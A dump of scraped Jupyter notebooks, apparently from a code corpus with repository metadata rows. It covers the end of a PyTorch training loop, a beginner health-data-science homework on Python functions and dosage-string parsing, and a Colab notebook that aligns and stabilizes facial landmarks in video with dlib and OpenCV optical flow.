print ('Accuracy: ', accu)
# print output label txt file
output_label = []
for pred_i in all_pred:
output_label.append(label_list[pred_i])
df = pd.DataFrame(output_label)
df.to_csv(model_name + "_pred.csv", sep=',',index=False, header=False)
return accu
def test(model, model_name):
model.eval()
all_pred = []
for i, data in enumerate(test_loader):
# get the inputs; data is a list of [inputs, labels]
inputs = data['data']
# forward + backward + optimize
outputs = model(inputs)
pred = torch.argmax(outputs, dim = 1)
all_pred += pred.tolist()
# print output label txt file
output_label = []
for pred_i in all_pred:
output_label.append(label_list[pred_i])
df = pd.DataFrame(output_label)
df.to_csv(model_name + "_pred_test.csv", sep=',',index=False, header=False)
# +
import torch.optim as optim
def train(net, model_name, epochs = 10):
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)
eval_accu = []
train_loss = []
eval(net, model_name)
for epoch in range(epochs): # loop over the dataset multiple times
running_loss = 0.0
for i, data in enumerate(trainloader):
# get the inputs; data is a list of [inputs, labels]
inputs = data['data']
labels = data['label'].long()
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = net(inputs)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
if i % 2000 == 1999: # print every 2000 mini-batches
train_loss.append(running_loss / 2000)
print('[%d, %5d / %d] loss: %.3f' %
(epoch + 1, i + 1, len(trainloader), running_loss / 2000))
running_loss = 0.0
eval_accu.append(eval(net, model_name))
if eval_accu[-1] == max(eval_accu):
torch.save(net.state_dict(), model_name + '.best')
df = pd.DataFrame(eval_accu)
df.to_csv(model_name + '_' + str(epochs) + "_accu.csv", sep=',',index=False, header=False)
df = pd.DataFrame(train_loss)
df.to_csv(model_name + '_' + str(epochs) + "_train_loss.csv", sep=',',index=False, header=False)
print('Finished Training')
print('Accuracy: ', eval_accu)
# +
# static training: 0.7542768273716952, 0.7822706065318819, 0.8087091757387247, 0.8087091757387247, 0.8009331259720063, 0.8040435458786936, 0.807153965785381, 0.7993779160186625, 0.80248833592535, 0.8040435458786936
#
train(net, 'static', 50)
# -
train(net_2, 'dynamic', 50)
train(net_3, 'dual', 50)
test(net_3, 'dual')
net_best = Net_dual().to(device)
net_best.load_state_dict(torch.load('dual.best'))
eval(net_best, 'model_best')
test(net_best, 'model_best')
| 8,858 |
/week13/week03-paulboal.ipynb
|
c7e5ac63f592fa2b62c3960fac0f9a4e055fa0f1
|
[
"MIT"
] |
permissive
|
aihill/slucor-hds5210-2018-1
|
https://github.com/aihill/slucor-hds5210-2018-1
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 8,857 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# _SLUCOR HDS5210 - Programming for Health Data Science - 2016 Fall_
#
# Week 3 (Sep 7) Exercises
# ===
#
# Before starting, be sure that you have completed the GitHub setup from week 2 and have your hds5210-week02 repository setup from the homework last assignments. You'll continue to use the same Git project / repository to submit your assignments.
# #1 - Creating Functions
# ---
#
# Write a function that will compute the sum of three numbers. Then use that function to calculate the sum of the eight numbers below:
#
# ```
# 4, 9, 12, 8, 16, 19, 11, 10
# ```
def sum3(a,b,c):
""" (float,float,float) -> float
Sums up just three numbers.
>>> sum3(1,2,3)
6
"""
return a + b + c
sum3( sum3(4,9,12), sum3(8,16,19), sum3(11,10,0) )
# The purpose here was to demonstrate how you could reuse your own function while you're calling your own function.
#
# ---
#
# ---
#
# #2 - Understanding Functions
# ---
#
# Try to reason through this set of instruction and determine what the output will be. Check your understanding by running the code in Jupyter. Then explain why the output is what it is.
#
# ```
# temp = 103
#
# def calculate_target (temp):
# temp -= 4
# return temp
#
# calculate_target (temp)
#
# print("The current value of temp is " + str(temp))
# ```
#
# When we define `temp = 103` we create a variable named `temp`. That `temp` and the `temp` variable that is used as the variable name for the parameter of our function `calculate_target` are not the same. The `temp` inside the function definition is called a "local variable" and it is different than the first `temp` we created. It hides the original `temp`. Our function takes whatever value it is given and subtracts 4 and then returns that value, however, we never do anything with the output from `calculate_target (temp)`. You can tell that because there's no variable to the left of the function call.
#
# If we had wanted to actually change our original variable `temp`, we could have said: `temp = calculate_target (temp)`.
#
# In that case, it would have executed this way:
# * `temp = 103`
# * `temp = calculate_target(temp)`
# * `temp = calculate_target(103)`
# * `temp = 94`
#
# ---
#
# ---
# #3 - Parsing Dosage Amounts and Units
# ---
#
# Create a function that will take as input an infusion dosage value and unit in the format `# volume/time` such as `45 mg/hr` or `0.2 L/hr`, and return just the numeric part of the dosage. It should return the numeric part as a floating point decimal number so that calculations can easily be done with the number.
#
# Demonstrate that your function works correctly using each of these tests:
# ```
# 1.0 L/hr
# 10 mg/hr
# 0.75 g/day
# ```
def get_amount(var):
space_pos = var.find(" ")
return float(var[0:space_pos])
get_amount('1.0 L/hr')
get_amount('10 mg/hr')
get_amount('0.75 g/day')
# ---
#
# ---
# #4 - Parsing and Rewriting a String
# ---
#
# Create another function or collection of functions that will take a string in the format `drug # volumne/time` such as `Asprin 20 mg/hr`, and return a string in the format `In one hr, the patient will have received 20 mg of Asprin. Doubling the dosage to 40 mg would be dangerous!`. Be sure that you reuse the other functions you've created in this assignment if possible.
#
# Demonstrate that your function works correctly using these tests:
#
# ```
# Asprin 20 mg/hr
# Amoxicillin 300 mg/day
# ```
def warning(var):
first_space = var.find(" ")
drug = var[0:first_space]
next_space = var.find(" ",first_space+2)
amount = var[first_space+1:next_space]
slash = var.find("/")
mass_unit = var[next_space+1:slash]
time_unit = var[slash+1:]
a = "In one {:s}, the patient will have received {:.2f} {:s} of {:s}.".format(time_unit,float(amount),mass_unit,drug)
b = "Doubling the dosage to {:.2f} {:s} would be dangerous!".format(float(amount)*2,mass_unit)
return a + " " + b
warning('Aspirin 20 mg/hr')
warning('Amoxicillin 300 mg/day')
# ---
#
# ---
#
# ## If you need any help remembing how to commit your work, look here:
#
# ```
# # %%bash
# # cd ~/notebooks/hds5210-week02/
# git add week03-paulboal.ipynb
# git commit -a -m "Adding homework for week 3"
# git push
# ```
| 4,550 |
/ProcessEncodeFiles.ipynb
|
83dbd9154bc100fdbf92d91818ae6f96cec613aa
|
[] |
no_license
|
vanya-antonov/lab_scripts
|
https://github.com/vanya-antonov/lab_scripts
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 86,072 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/sudhakarmlal/EVA/blob/master/Assignment23/Assignment23.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="VOUWYfilVIGn" colab_type="text"
# Assignment - 23
# --------------------
# Name : K Sudhakar Reddy
#
# Background :
# The Purpose of this assignment is to perform image stabilization and alignment. This task is very much required for performing a facial recognition task. The modern networks are very good at recognizing faces, however the accuracy improves when the face is given in the image is stabilized and aligned properly. So for any face recognition task one of the important pre processing is Face alignment and stabilization .
#
#
# Requirements
# -------------
# Implement the following:
# This Assignment requires us to take a video of 5 seconds as the ground truth with a minimal translation/variance and outputs(take a 5 second video of your face with some translation and rotation (not extreme) a video with 3 different output which includes
# 1. Original frame
# 2. Aligned Frame with unstabilized points
# 3. Aligned Frame with stabilzed points
#
# That means If the original video was 400x400 resolution, final video is 1200x400. Final video is 5 seconds and we need to see all 3 videos side by side for comparison. Upload to youtube, and embed the video in your readme file.
#
# We will use the following method to achieve this
# 1. Use dlib Face Detector
# 2. Align the face using 5-pt detector and align
# 3. Calculate 68-pt landmark on the aligned faces
# 4. Calculate the optical flow for these 68-pts every frame
# 5. Stabilize the optical flow using LK method as we discussed.
#
# Environment
# ------------------
# Development - Colab GPU , Jupyter Notebook Repository : Github
#
# Models :
# 1. 5 Point Landmark model
# 2. 68 Point landmark model
#
# + [markdown] id="uh6AldltZGs5" colab_type="text"
# # Link Google Drive to Colab Notebook
# + id="3voQkDsMVItH" colab_type="code" outputId="f1204597-ca7b-4f6a-9b19-6b5fd0e5e75d" colab={"base_uri": "https://localhost:8080/", "height": 124}
from google.colab import drive
drive.mount('/content/drive')
# + [markdown] id="Q5AbYBOIZS5D" colab_type="text"
# # import all the libraries to notebook
# + id="1rYSUnCWct98" colab_type="code" colab={}
import cv2, dlib
import numpy as np
import math, sys
import matplotlib.pyplot as plt
# %matplotlib inline
# + [markdown] id="NSZkoQT8ZYbw" colab_type="text"
# #Copy Contents to Current Working Directory
# + id="UJ0AgTQQ_lfZ" colab_type="code" colab={}
# !cp -r '/content/drive/My Drive/EVA-18/models' /content
# !cp -r '/content/drive/My Drive/EVA-18/videos' /content
# !cp '/content/drive/My Drive/EVA-18/faceBlendCommon.py' /content
# + [markdown] id="d5YqKwIAZaLy" colab_type="text"
# # Matplotlib Operations to resize image and change the scale
# + id="yLM2RPk4cysY" colab_type="code" colab={}
import matplotlib
matplotlib.rcParams['figure.figsize'] = (6.0,6.0)
matplotlib.rcParams['image.cmap'] = 'gray'
# + [markdown] id="CPhSPxGdZgCb" colab_type="text"
# # import os
# + id="RBL6OkRd_3W8" colab_type="code" colab={}
import os
# + [markdown] id="8PSb8Q4iZim0" colab_type="text"
# # Function to save images to the specified directory in Google Drive
# + id="36vhNxjfc8ek" colab_type="code" colab={}
def save_all_images(path, filename, imageList):
for cnt in range(0, len(imageList)):
temp_fn = filename + '_' + str(cnt) + '.png'
fn = os.path.join(path) + os.path.join(temp_fn)
cv2.imwrite(fn, imageList[cnt])
# + [markdown] id="Jvfx_jYLZluE" colab_type="text"
# # Read the Video file from Google Drive and convert that into images
# + id="0h1W8Mggc3rV" colab_type="code" colab={}
cap = cv2.VideoCapture('/content/videos/video_eva18.mp4')
all_frames = []
while(cap.isOpened()):
ret, frame = cap.read()
if frame is None:
break
all_frames.append(frame)
#plt.imshow(frame)
cap.release()
# + [markdown] id="CW730WsWZqz3" colab_type="text"
# # Display an image for testing
# + id="3v2QXDscAV45" colab_type="code" outputId="420c5885-a2aa-4c31-cceb-222baf5374e7" colab={"base_uri": "https://localhost:8080/", "height": 332}
plt.imshow(all_frames[0][:,:,::-1])
# + [markdown] id="6xXC_zaKZsth" colab_type="text"
# # Create a directory names test inside the parent directory
# + id="tumjb_cEAY9O" colab_type="code" colab={}
directory = "test"
# Parent Directory path
parent_dir = "/content/drive/My Drive/EVA-18/"
# Path
path = os.path.join(parent_dir, directory)
os.mkdir(path)
# + [markdown] id="9ZPahyL2ZvzE" colab_type="text"
# # Make another diretcory for keeping the original images
# + id="E0qbDu9yAqFW" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/original')
# + [markdown] id="7Xc2s_DZZ74M" colab_type="text"
# Save all images to the folder
# + id="Ftid6Fu8A--Q" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/original/', 'frame', all_frames)
# + [markdown] id="L23rKOK6Z9pn" colab_type="text"
# # Define path for the 5 point landmark model
# + id="D7CGOVWjBIKH" colab_type="code" colab={}
MODEL_PATH = '/content/drive/My Drive/EVA-18/models/'
PREDICTOR_PATH = MODEL_PATH + "shape_predictor_5_face_landmarks.dat"
# + [markdown] id="Uz4HD2P0Z_ep" colab_type="text"
# #define the object to detect front faces
# + id="YIjT8Dp0BYK3" colab_type="code" colab={}
faceDetector = dlib.get_frontal_face_detector()
# The landmark detector is implemented in the shape_predictor class
landmarkDetector = dlib.shape_predictor(PREDICTOR_PATH)
# + [markdown] id="IttQK0L4aCZB" colab_type="text"
# # Import user defined helper functions
# + id="hc33a8RcBiM1" colab_type="code" colab={}
import faceBlendCommon as fbc
# + [markdown] id="QVnewIBEaGLO" colab_type="text"
# # The foloowing functions takes an image and aligns using 5 point landmark
# + id="6wxg4I_TBbQP" colab_type="code" colab={}
# get the aligned face
def get_aligned_face(im):
# Detect faces in the image
#print('image tensor is',im)
faceRects = faceDetector(im, 0)
print("Number of faces detected: ",len(faceRects))
# Detect landmarks.
points = fbc.getLandmarks(faceDetector, landmarkDetector, im)
print('length of points is', points)
#len(points)
points = np.array(points)
print('after np array',len(points))
# Convert image to floating point in the range 0 to 1
im = np.float32(im)/255.0
# Dimensions of output image
h = 600
w = 600
# Normalize image to output coordinates.
if len(points) > 0:
imNorm, points = fbc.normalizeImagesAndLandmarks((h, w), im, points)
imNorm = np.uint8(imNorm*255)
return imNorm
else:
return im
# + [markdown] id="fqVTHg-haQsm" colab_type="text"
# # Calls the Alignment method to align each image
# + id="w1wnic5HBdvt" colab_type="code" outputId="e2eb9e21-cd8c-4813-95e8-c42977e8cf83" colab={"base_uri": "https://localhost:8080/", "height": 1000}
all_aligned_faces = []
print('Aligning all frames... ')
# process one frame at a time.
for cnt in range(0, len(all_frames)):
frame = all_frames[cnt]
aligned_face = get_aligned_face(frame)
all_aligned_faces.append(aligned_face)
print('Done!')
# + [markdown] id="-cAxqFY6aW5q" colab_type="text"
# # Let's display one original image for testing
# + id="8EgmV0SvPMQo" colab_type="code" outputId="a9191edc-19d8-4e61-b25c-510e4fc6a745" colab={"base_uri": "https://localhost:8080/", "height": 327}
plt.imshow(all_frames[50][:,:,::-1])
plt.title("Original Image")
plt.show()
# + [markdown] id="k_xNV8zbaaT1" colab_type="text"
# # Display the aligne image
# + id="Q_pPsn6tBgSu" colab_type="code" outputId="0b5c8163-7eb6-493d-f54a-459416268a60" colab={"base_uri": "https://localhost:8080/", "height": 390}
plt.imshow(all_aligned_faces[50][:,:,::-1])
plt.title("Aligned Image")
plt.show()
# + [markdown] id="5Zqa1gC-adSl" colab_type="text"
# # Make a directory for saving the aligned images
# + id="SWTOcMLrPGVp" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/aligned_face')
# + [markdown] id="1GYd-re1ahhC" colab_type="text"
# # Save all aligned images to folder in gdrive
# + id="w-_0fAz5QDm4" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/aligned_face/', 'align_face', all_aligned_faces)
# + [markdown] id="wKU7w0WtamG3" colab_type="text"
# # Load the 68 point landmark detector
# + id="P403O3oAOQVU" colab_type="code" colab={}
MODEL_PATH = '/content/drive/My Drive/EVA-18/models/'
PREDICTOR_PATH_2 = MODEL_PATH + "shape_predictor_68_face_landmarks.dat"
# + [markdown] id="g7HNYvShap9l" colab_type="text"
# # Create an object for the frontal face method /class
# + id="G8-8tBH2PvMo" colab_type="code" colab={}
faceDetector = dlib.get_frontal_face_detector()
landmarkDetector = dlib.shape_predictor(PREDICTOR_PATH_2)
# + [markdown] id="GsGPM_dFau1Q" colab_type="text"
# # function to reder the face
# + id="W81ZCoDcM5SU" colab_type="code" colab={}
def renderFace2(im, landmarks, color=(200, 0, 0), radius=3):
for p in landmarks.parts():
cv2.circle(im, (p.x, p.y), radius, color, -1)
# + [markdown] id="UlgIJRF4ax2K" colab_type="text"
# # method to get landmark aligned face
# + id="s3i43SFxK15s" colab_type="code" colab={}
# get the aligned face
def get_landmarks_aligned_face(im):
# Detect faces in the image
#print('image tensor is',im)
faceRects = faceDetector(im, 0)
for i in range(0, len(faceRects)):
newRect = dlib.rectangle(int(faceRects[i].left()),
int(faceRects[i].top()),
int(faceRects[i].right()),
int(faceRects[i].bottom()))
# For every face rectangle, run landmarkDetector
landmarks = landmarkDetector(im, newRect)
# Print number of landmarks
if i==0:
print("Number of landmarks",len(landmarks.parts()))
renderFace2(im, landmarks,color=(200,0,0),radius=3)
# + [markdown] id="8fTWmBPXa6UY" colab_type="text"
# # calls the method which gives the 68 landmark points on the face
# + id="oXdLnpWfLvXC" colab_type="code" outputId="cc380411-bb3b-4cea-af7c-c8a1c2daf9b6" colab={"base_uri": "https://localhost:8080/", "height": 935}
all_landmark_faces = []
for cnt in range(0, len(all_aligned_faces)):
frame = all_aligned_faces[cnt]
landmark_face = get_landmarks_aligned_face(frame)
all_landmark_faces.append(landmark_face)
print('Done!')
# + [markdown] id="DVANIfCjbBY6" colab_type="text"
# # Let's display the landmarks on the unstabilized image
# + id="y4i7dGodMIlZ" colab_type="code" outputId="dde34d10-ea5b-4d34-c8c5-5d9074924208" colab={"base_uri": "https://localhost:8080/", "height": 390}
plt.imshow(all_landmark_faces[1][:,:,::-1])
plt.title("Landmark Image")
plt.show()
# + [markdown] id="zuoJtvDnbFG4" colab_type="text"
# # create a directory for storing these images
# + id="H8xbxtMJSkhv" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/landmark_faces')
# + [markdown] id="8iPK5hlWbIUp" colab_type="text"
# # save all images to the folder
# + id="mepqqR7FTKpu" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/landmark_faces/','landmarks',all_landmark_faces)
# + [markdown] id="LxYy24h0bLiw" colab_type="text"
# # This method converts frames to videos
# + id="MGBV1_ZKxjxF" colab_type="code" outputId="72ffb2c2-7de2-4c36-b8c8-aaec664c2125" colab={"base_uri": "https://localhost:8080/", "height": 1000}
from os.path import isfile, join
def convert_frames_to_video(pathIn,pathOut,fps):
frame_array = []
files = [f for f in os.listdir(pathIn) if isfile(join(pathIn, f))]
#for sorting the file names properly
# files.sort(key = lambda x: float(x[5:-4]))
for i in range(len(files)):
filename=pathIn + files[i]
#reading each files
img = cv2.imread(filename)
height, width, layers = img.shape
size = (width,height)
print(filename)
#inserting the frames into an image array
frame_array.append(img)
out = cv2.VideoWriter(pathOut,cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
for i in range(len(frame_array)):
# writing to a image array
out.write(frame_array[i])
out.release()
pathIn= '/content/drive/My Drive/EVA-18/test/aligned_face/'
pathOut = '/content/drive/My Drive/EVA-18/videos/align.mp4'
fps = 10.0
convert_frames_to_video(pathIn, pathOut, fps)
# + [markdown] id="XezekqovbTLX" colab_type="text"
# # resize the images which can be used to stabilize the faces later
# + id="CdFiGsIOQRmY" colab_type="code" colab={}
MODEL_PATH = '/content/drive/My Drive/EVA-18/models/'
PREDICTOR_PATH = MODEL_PATH + "shape_predictor_68_face_landmarks.dat"
RESIZE_HEIGHT = 480
NUM_FRAMES_FOR_FPS = 100
SKIP_FRAMES = 1
# + [markdown] id="yXIr_RdSbZBO" colab_type="text"
# # method to calculate and return the distnace between the eyes for stabilization
# + id="snN7aYsdQciZ" colab_type="code" colab={}
def interEyeDistance(predict):
leftEyeLeftCorner = (predict[36].x, predict[36].y)
rightEyeRightCorner = (predict[45].x, predict[45].y)
distance = cv2.norm(np.array(rightEyeRightCorner) - np.array(leftEyeLeftCorner))
distance = int(distance)
return distance
# + id="TFDejDtAQfHX" colab_type="code" colab={}
winName = "Stabilized facial landmark detector"
# + id="Xf3tZi2sQg7c" colab_type="code" colab={}
videoFileName = "/content/drive/My Drive/EVA-18/videos/align.mp4"
# Initializing video capture object.
cap = cv2.VideoCapture(videoFileName)
if(cap.isOpened()==False):
print("Unable to load video")
# + id="iybntwatQnWB" colab_type="code" colab={}
import math
from google.colab.patches import cv2_imshow
# + [markdown] id="QpjMQfLsbkzX" colab_type="text"
# # define parameters
# + id="nxpkBrYrQqBr" colab_type="code" colab={}
winSize = 101
maxLevel = 10
fps = 30.0
# Grab a frame
ret,imPrev = cap.read()
# + id="0vrEwHI6Qsw9" colab_type="code" colab={}
size = imPrev.shape[0:1]
# + id="E8-uQeAgQu-u" colab_type="code" outputId="2caa1ba9-6929-4d8b-d442-1498337cbb9d" colab={"base_uri": "https://localhost:8080/", "height": 54}
print(size)
print(imPrev.shape)
# + [markdown] id="MvLiyauybon5" colab_type="text"
# # create objects for landmark detector
# + id="QRyy4t5eQweY" colab_type="code" colab={}
detector = dlib.get_frontal_face_detector()
landmarkDetector = dlib.shape_predictor(PREDICTOR_PATH)
# + [markdown] id="hSBE9zaXbsGz" colab_type="text"
# # declare variables to capture stabilization points
# + id="BrlSSaRsQzJn" colab_type="code" colab={}
points=[]
pointsPrev=[]
pointsDetectedCur=[]
pointsDetectedPrev=[]
# + id="fK_WIf0lRGQe" colab_type="code" colab={}
eyeDistanceNotCalculated = True
eyeDistance = 0
isFirstFrame = True
# Initial value, actual value calculated after 100 frames
fps = 10
showStabilized = False
count =0
# + id="lS5aj4arRH1Z" colab_type="code" colab={}
all_stabilized_frames = []
# + [markdown] id="SK6tiPn7bzPN" colab_type="text"
# # The following lines of code calculates
# 1. converts BGR to RGB followed by gray scale
# 2. optical flow for each pixel in the image
# 3. Stabilize the optical flow using LK method
# 4. resize the image
# 5. Align the face using stabilized points
#
# + id="o6nR0zXJRKGY" colab_type="code" outputId="ce916bdf-5b77-4912-fa50-e4c900f96791" colab={"base_uri": "https://localhost:8080/", "height": 1000}
while(True):
if (count==0):
t = cv2.getTickCount()
# Grab a frame
ret,im = cap.read()
if im is None:
break
imDlib = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
# COnverting to grayscale
imGray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
imGrayPrev = imGray
height = im.shape[0]
IMAGE_RESIZE = float(height)/RESIZE_HEIGHT
# Resize image for faster face detection
imSmall = cv2.resize(im, None, fx=1.0/IMAGE_RESIZE, fy=1.0/IMAGE_RESIZE,interpolation = cv2.INTER_LINEAR)
imSmallDlib = cv2.cvtColor(imSmall, cv2.COLOR_BGR2RGB)
# Skipping the frames for faster processing
if (count % SKIP_FRAMES == 0):
faces = detector(imSmallDlib,0)
# If no face was detected
if len(faces)==0:
print("No face detected")
else:
for i in range(0,len(faces)):
print("face detected")
# Face detector was found over a smaller image.
# So, we scale face rectangle to correct size.
newRect = dlib.rectangle(int(faces[i].left() * IMAGE_RESIZE),
int(faces[i].top() * IMAGE_RESIZE),
int(faces[i].right() * IMAGE_RESIZE),
int(faces[i].bottom() * IMAGE_RESIZE))
# Detect landmarks in current frame
landmarks = landmarkDetector(imDlib, newRect).parts()
# Handling the first frame of video differently,for the first frame copy the current frame points
if (isFirstFrame==True):
pointsPrev=[]
pointsDetectedPrev = []
[pointsPrev.append((p.x, p.y)) for p in landmarks]
[pointsDetectedPrev.append((p.x, p.y)) for p in landmarks]
# If not the first frame, copy points from previous frame.
else:
pointsPrev=[]
pointsDetectedPrev = []
pointsPrev = points
pointsDetectedPrev = pointsDetectedCur
# pointsDetectedCur stores results returned by the facial landmark detector
# points stores the stabilized landmark points
points = []
pointsDetectedCur = []
[points.append((p.x, p.y)) for p in landmarks]
[pointsDetectedCur.append((p.x, p.y)) for p in landmarks]
# Convert to numpy float array
pointsArr = np.array(points,np.float32)
pointsPrevArr = np.array(pointsPrev,np.float32)
# If eye distance is not calculated before
if eyeDistanceNotCalculated:
eyeDistance = interEyeDistance(landmarks)
print(eyeDistance)
eyeDistanceNotCalculated = False
if eyeDistance > 100:
dotRadius = 3
else:
dotRadius = 2
print(eyeDistance)
sigma = eyeDistance * eyeDistance / 400
s = 2*int(eyeDistance/4)+1
# Set up optical flow params
lk_params = dict(winSize = (s, s), maxLevel = 5, criteria = (cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS, 20, 0.03))
pointsArr,status, err = cv2.calcOpticalFlowPyrLK(imGrayPrev,imGray,pointsPrevArr,pointsArr,**lk_params)
# Converting to float
pointsArrFloat = np.array(pointsArr,np.float32)
# Converting back to list
points = pointsArrFloat.tolist()
# Final landmark points are a weighted average of
# detected landmarks and tracked landmarks
for k in range(0,len(landmarks)):
d = cv2.norm(np.array(pointsDetectedPrev[k]) - np.array(pointsDetectedCur[k]))
alpha = math.exp(-d*d/sigma)
points[k] = (1 - alpha) * np.array(pointsDetectedCur[k]) + alpha * np.array(points[k])
# Drawing over the stabilized landmark points
if showStabilized is True:
for p in points:
cv2.circle(im,(int(p[0]),int(p[1])),dotRadius, (255,0,0),-1)
else:
for p in pointsDetectedCur:
cv2.circle(im,(int(p[0]),int(p[1])),dotRadius, (0,0,255),-1)
isFirstFrame = False
count = count+1
if ( count == NUM_FRAMES_FOR_FPS):
t = (cv2.getTickCount()-t)/cv2.getTickFrequency()
fps = NUM_FRAMES_FOR_FPS/t
count = 0
isFirstFrame = True
# Display the landmarks points
cv2.putText(im, "{:.1f}-fps".format(fps), (50, size[0]-50), cv2.FONT_HERSHEY_COMPLEX, 1.5, (0, 0, 255), 3,cv2.LINE_AA)
#cv2.imshow(winName, im)
#cv2_imshow(im)
# key = cv2.waitKey(25) & 0xFF
# # Use spacebar to toggle between Stabilized and Unstabilized version.
# if key==32:
# showStabilized = not showStabilized
# # Stop the program.
# if key==27:
# sys.exit()
all_stabilized_frames.append(im)
# Getting ready for next frame
imPrev = im
imGrayPrev = imGray
# cv2.destroyAllwindows()
cap.release()
# + [markdown] id="-xFMlWBMcsiM" colab_type="text"
# # Display one of the stabilized and aligned image
# + id="cWPWFebIRrCG" colab_type="code" outputId="f3a9a34b-22f2-4625-db90-ba7dba7f7477" colab={"base_uri": "https://localhost:8080/", "height": 390}
plt.imshow(all_stabilized_frames[17][:,:,::-1])
plt.title("Stabilized Image")
plt.show()
# + [markdown] id="2Qp6U4qHcxcX" colab_type="text"
# # save the stabilized and aligned images to gdrive
# + id="EOUUv1RaSdSr" colab_type="code" colab={}
all_stabilized_frames.insert(0, all_stabilized_frames[0])
# + id="SKHCs9d4bD4I" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/stablize')
# + id="PTLXkGQ7bReW" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/stablize/', 'stablize_face', all_stabilized_frames)
# + [markdown] id="mFogCc6nc2nG" colab_type="text"
#
# + id="E4RtjS7tbgXt" colab_type="code" outputId="94b9e586-272f-4a72-ad8e-3abc95aaf220" colab={"base_uri": "https://localhost:8080/", "height": 1000}
pathIn= '/content/drive/My Drive/EVA-18/test/stablize/'
pathOut = '/content/drive/My Drive/EVA-18/videos/stable.mp4'
fps = 10.0
convert_frames_to_video(pathIn, pathOut, fps)
# + [markdown] id="LvIyiZ6_dSg8" colab_type="text"
# # Create a kist if images
# + id="uhfxQPCS1kGc" colab_type="code" colab={}
def read_all_images(dir, filename_prefix, num_files):
result_list = []
for cnt in range(0, num_files):
fn = filename_prefix + '_' + str(cnt) + '.png'
full_path = os.path.join(dir, fn)
img = cv2.imread(full_path)
result_list.append(img)
return result_list
# + [markdown] id="o5EHa8AGdU81" colab_type="text"
# # Create variables to each of the
# 1. Original Image
# 2. Aligned unstabilized image
# 3. Aligned stabilized image
#
# + id="uIB-zSNI4d75" colab_type="code" colab={}
original_frames = read_all_images('/content/drive/My Drive/EVA-18/test/original', 'frame', 114)
# + id="m8KN7K0z4sOW" colab_type="code" colab={}
aligned_frames = read_all_images('/content/drive/My Drive/EVA-18/test/aligned_face', 'align_face', 114)
# + id="c9FBTka75WSC" colab_type="code" colab={}
stable_frames = read_all_images('/content/drive/My Drive/EVA-18/test/stablize', 'stablize_face', 114)
# + id="3cjiyLBW5gWi" colab_type="code" outputId="5f223834-a89a-47c5-bc0e-977f3a4b765a" colab={"base_uri": "https://localhost:8080/", "height": 72}
print(original_frames[0].shape)
print(aligned_frames[0].shape)
print(stable_frames[0].shape)
# + [markdown] id="eU5hijUkddXz" colab_type="text"
# # Resize the images
# + id="9TRyBdkq5jjD" colab_type="code" colab={}
def resize_images(imageList, width, height):
result_list = []
for cnt in range(0, len(imageList)):
new_img = cv2.resize(imageList[cnt], (width, height), interpolation=cv2.INTER_AREA)
result_list.append(new_img)
return result_list
# + id="RYP2MvIO5vCl" colab_type="code" colab={}
orig_frames_resized = resize_images(original_frames, 600, 600)
# + id="CWSA2l6r6GiX" colab_type="code" outputId="98b860cf-270a-44b0-aeb8-850ad54376d4" colab={"base_uri": "https://localhost:8080/", "height": 35}
orig_frames_resized[0].shape
# + id="7Ta6zMZ06pxO" colab_type="code" colab={}
aligned_frames_resized=resize_images(aligned_frames,600,600)
# + id="GQm_B0rk8R_p" colab_type="code" outputId="9e61eeba-eda7-42c3-8ecc-577cdb9bd69d" colab={"base_uri": "https://localhost:8080/", "height": 35}
np.shape(orig_frames_resized)
# + id="VvNtp4si8jr1" colab_type="code" outputId="01e573ad-a9d0-47f1-efd7-507fd612cead" colab={"base_uri": "https://localhost:8080/", "height": 35}
np.shape(aligned_frames_resized)
# + id="1FcnjUrqApSG" colab_type="code" outputId="fc1e8198-cab1-4cd6-9b30-adaa836c8ea1" colab={"base_uri": "https://localhost:8080/", "height": 35}
np.shape(stable_frames)
# + id="r1PBhnbtAs3O" colab_type="code" colab={}
stable_frames_resized=resize_images(stable_frames,600,600)
# + [markdown] id="FZQW5WdQdh6t" colab_type="text"
# # Concatenate all the images side by side
# 1. Now the size of each image is 1200x400 ( 3 * 400 x 400 )
# 2. Convert the images int video
# + id="T7K3R17E5zMn" colab_type="code" colab={}
new_frames = []
for cnt in range(0, len(orig_frames_resized)):
new_img = np.hstack((orig_frames_resized[cnt], aligned_frames_resized[cnt], stable_frames[cnt]))
new_frames.append(new_img)
# + [markdown] id="1udRfKxFdkJ-" colab_type="text"
# # Display one of the images
# + id="Z50-krxz55tb" colab_type="code" outputId="03b56e45-b4a9-4323-821e-22dbbc423858" colab={"base_uri": "https://localhost:8080/", "height": 181}
plt.imshow(new_frames[27][:,:,::-1])
# + [markdown] id="kTjwrXz3dnFW" colab_type="text"
# # Save it to drive
# + id="hIpZTe9BBnhJ" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/final/')
# + id="aL1k_HMsDNcS" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/final/', 'final', new_frames)
# + [markdown] id="tLbfqgiCdqCt" colab_type="text"
